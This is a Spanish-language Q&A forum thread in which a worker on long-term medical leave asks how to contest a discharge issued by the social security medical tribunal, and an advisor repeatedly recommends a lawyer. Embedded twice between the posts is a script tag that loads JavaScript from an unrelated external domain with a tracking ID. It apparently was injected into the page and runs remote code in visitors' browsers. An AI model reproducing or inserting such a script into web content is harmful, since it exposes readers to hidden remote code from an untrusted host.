Respuesta del tribunal medico

El día 9 pasado fui a pasar el tribunal medico por agotamiento de plazo, 12 meses de baja. Estoy pendiente de varias pruebas medicas. Ayer me llama el contable diciendo que el miércoles recibió una carta certificada con acuse de recibo diciendo que el jueves tenia que reincorporarme a mi puesto de trabajo.
Yo no he recibido ninguna notificación del tribunal, me dijeron que en unos 15 días tendría la resolución, los hace hace el viernes laborables.
Que tengo que hacer, me pueden obligar a volver a trabajar si no puedo casi moverme de la cama.
Tengo un problema en las cervicales serio, no puedo coger peso ni mover mucho los brazos ni la cabeza, dolores fuertes y mareos. La cadera izquierda y las rodillas me duelen muchísimo, de un accidente de trabajo que pasan de largo siempre. El reumatólogo dice que seguramente sera fibromialgia, están en ello.
¿Me pueden quitar el sueldo de los días que no me haya incorporado al trabajo? ¿Cómo voy a estar 9 horas de pe en una tienda cogiendo peso si ni siquiera puedo estar de pie?

1 Respuesta

Respuesta

¿Esa dolencia que padece ahora es la misma que la que llevó causa a pasar el Tribunal Médico?

 La baja medica en un principio era por la hipertensión descontrolada y muy alta. Después se han sumado problemas de cervicales y otros que vengo quejándome desde hace años sin que me hiciesen mucho caso, hasta que la doctora que tengo ahora por fin me ha enviado a los especialistas. Estoy a la espera de pruebas diagnosticas.

Ayer fui al INSS y me dijeron que me habían dado el alta por finalización de plazos, al hacer 52 semanas de baja medica. Me dieron un impreso para recurrir.

Al tribunal médico lleve todos los informes de los últimos tiempos, de hace tres años, pero seleccionados. Espero su respuesta en breve.

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BF3691585-2096-44BD-B954-6392C947DE3A%7D"></script>

Usted esperará la respuesta en breve, pero tarda varios días en contestar a la pregunta que le formulé.

Para recurrir y no caer en errores que luego no se puedan encarrilar, le aconsejo que con todos los documentos que obran en su poder acuda al despacho de un Abogado y que le formule el recurso con fundamentación jurídica.

Debería aportar un certificado médico de quea sido reenviada a otros especialistas para estudio.

Ruego cierre y valore

Estos días han sucedido muchas cosas. Me han visto en el tribunal medico y han ratificado el alta por agotamiento de plazo por la enfermedad que se me otorgo.

Como estoy en puertas de una operación de estenosis del canal cervical, mi doctora dice que no puedo trabajar, pero no me puede dar la baja.

Esta mañana en la enésima visita al inspector medico me enseña la pantalla del ordenador y me dice que el alta es por las dolencias actuales.

Pregunto a una persona conocida por esta situación, este muy informada, y me dice que básicamente me han tomado el pelo. Que mire el parte de alta médica que pone. Lo busco y efectivamente porque que me dan el alta por agotamiento de plazo por la enfermedad de hipertensión benigna. En ningún sitio pone las enfermedades actuales.

Que fuerza tengo y que pasos debo dar sin recurrir a un abogado, pocos medios, para sacarles la verdad, ya que creo que me han dicho algo que no es cierto.

Muchas gracias.

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BF3691585-2096-44BD-B954-6392C947DE3A%7D"></script>

Las dolencia que usted presenta ahora nada tienen que ver con las que motivaron su baja, por eso le indiqué que acudiera a un despacho de Abogado para que le recurra la resolución que le dieron por escrito por no estar ajustada a derecho.
Igualmente tendrá que impugnar la negativa del médico de cabecera por negarse a extenderle la baja dado el cuadro que presenta actualmente.
Ruego cierre y valore

Muchas gracias y disculpe la tardanza en contestar. Me da miedo buscar un abogado y pagar un dinero que no tengo y que la ES.Social guarde mi caso en un cajón, como creo que hacen hasta que me aburra. En fin mirare a ver. Gracias de nuevo.